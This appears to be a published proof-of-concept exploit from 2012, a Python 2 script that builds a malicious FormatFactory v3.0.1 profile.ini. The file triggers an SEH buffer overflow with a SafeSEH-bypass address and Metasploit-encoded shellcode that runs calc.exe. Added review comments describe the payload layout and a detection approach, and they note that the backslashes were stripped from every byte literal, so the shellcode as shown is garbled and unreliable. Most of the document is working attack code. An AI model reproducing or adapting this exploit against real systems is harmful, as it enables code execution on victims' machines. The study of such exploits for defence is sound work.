
# Title : FormatFactory v3.0.1 Profile File Handling Buffer Overflow
# Published : 2012-11-20
# Author :


#!/usr/bin/python
 
# Exploit Title: FormatFactory v3.0.1 Profile File Handling Buffer Overflow
# Version:       <= 3.0.1
# Date:          2012-11-19
# Author:        Julien Ahrens (@MrTuxracer)
# Homepage:      http://www.inshell.net
# Software Link: http://www.pcfreetime.com
# Tested on:     Windows XP SP3 Professional German
# Notes:         -
# Howto:         Copy .ini to %USERPROFILE%My DocumentsFormatFactoryPicCustom

from struct import pack

# Output path for the crafted profile.  NOTE: `file` shadows the Python 2
# builtin of the same name; harmless in this script but worth renaming in
# any reuse.
file="profile.ini"

# NOTE(review): every "\x.." escape in this listing lost its backslash during
# extraction ("xCC", "x90", "xeb" ...), so as shown these literals are plain
# ASCII text, not the byte values the comments describe.  The structure is
# readable, the byte content is not.
#
# Layout of the oversized "Type=" value, in order: 260 bytes of filler, the
# next-SEH record, the handler address (the SafeSEH-bypass gadget named in
# the comment on the `eip` line), a short NOP slide, the payload, and 10000
# bytes of trailing filler.
junk1="xCC" * 260
# Next-SEH record that precedes the overwritten handler pointer.
nseh="xebx06x90x90"
# Packed as a little-endian 32-bit address, so this one is real bytes.
eip=pack('<L',0x024C1923) # CALL DWORD PTR SS:[EBP-C] at 0x024c1923 - SafeSEH Bypass
nops="x90" * 10 
junk2="xCC" * 10000

# windows/exec CMD=calc.exe 
# Encoder: x86/shikata_ga_nai
# powered by Metasploit 
# msfpayload windows/exec CMD=calc.exe R | msfencode -b 'x00'

# Payload: the Metasploit-generated calc.exe launcher described above.  The
# same lost-backslash caveat applies to every literal in this concatenation.
shellcode = ("xbax68x3ex85x1fxd9xcaxd9x74x24xf4x58x29xc9" +
"xb1x33x31x50x12x83xe8xfcx03x38x30x67xeax44" +
"xa4xeex15xb4x35x91x9cx51x04x83xfbx12x35x13" +
"x8fx76xb6xd8xddx62x4dxacxc9x85xe6x1bx2cxa8" +
"xf7xadxf0x66x3bxafx8cx74x68x0fxacxb7x7dx4e" +
"xe9xa5x8ex02xa2xa2x3dxb3xc7xf6xfdxb2x07x7d" +
"xbdxccx22x41x4ax67x2cx91xe3xfcx66x09x8fx5b" +
"x57x28x5cxb8xabx63xe9x0bx5fx72x3bx42xa0x45" +
"x03x09x9fx6ax8ex53xe7x4cx71x26x13xafx0cx31" +
"xe0xd2xcaxb4xf5x74x98x6fxdex85x4dxe9x95x89" +
"x3ax7dxf1x8dxbdx52x89xa9x36x55x5ex38x0cx72" +
"x7ax61xd6x1bxdbxcfxb9x24x3bxb7x66x81x37x55" +
"x72xb3x15x33x85x31x20x7ax85x49x2bx2cxeex78" +
"xa0xa3x69x85x63x80x86xcfx2exa0x0ex96xbaxf1" +
"x52x29x11x35x6bxaax90xc5x88xb2xd0xc0xd5x74" +
"x08xb8x46x11x2ex6fx66x30x4dxeexf4xd8xbcx95" +
"x7cx7axc1")

# The whole file is a single INI key.  Defensive note: the observable artefact
# of this issue is a FormatFactory profile .ini whose "Type=" value runs to
# thousands of bytes, the bulk of it repeated 0xCC filler; a length check on
# that value at parse time is the mitigation the vulnerable parser lacks.
poc="Type=" + junk1 + nseh + eip + nops + shellcode + junk2 

# Python 2 syntax (print statements, bare `except`).  Review notes on this
# block: the bare `except:` swallows every exception, including
# KeyboardInterrupt, and hides the real cause behind a generic message; the
# file is not closed if `write` raises (no `with`); and opening in text mode
# ("w") rather than "wb" would let newline translation alter payload bytes
# on Windows if any were 0x0A -- presumably irrelevant here, but worth
# noting.  The "n" in the first message is another lost "\n".
try:
    print "[*] Creating exploit file...n";
    writeFile = open (file, "w")
    writeFile.write( poc )
    writeFile.close()
    print "[*] File successfully created!";
except:
    print "[!] Error while creating file!";